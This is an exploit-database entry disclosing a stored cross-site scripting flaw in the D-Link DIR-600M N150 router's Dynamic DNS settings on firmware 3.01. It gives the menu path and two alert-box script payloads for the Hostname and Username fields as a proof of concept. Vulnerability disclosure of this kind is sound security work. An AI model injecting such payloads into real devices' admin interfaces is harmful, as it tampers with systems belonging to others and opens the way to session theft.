id: 31051
date: 09/06/2018
title: D-Link Dir-600M N150 - Cross-Site Scripting Vulnerability
author: PUNIT DARJI
cves: 

# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting
# Exploit Author: PUNIT DARJI
# Vendor Homepage: www.dlink.co.in
# Hardware Link: https://amzn.to/2NUIniO
# Version: DIR-600M Firmware 3.01
# Tested on: Windows 7 ultimate
# CVE: N/A
 
#POC
 
Goto your Wifi Router Gateway [i.e: 192.168.X.X ip address of router]
Go to --> "Advance" --> "Dynamic DNS" --> "Hostname"
<script>alert("PSYCHO55")</script>
"Username" --> <script>alert("PunitDarji")</script>
and hit apply Refresh the page, and you will get the 2 pop-up first
"PSYCHO55" and second "PunitDarji".

#  0day.today [2023-03-23]  #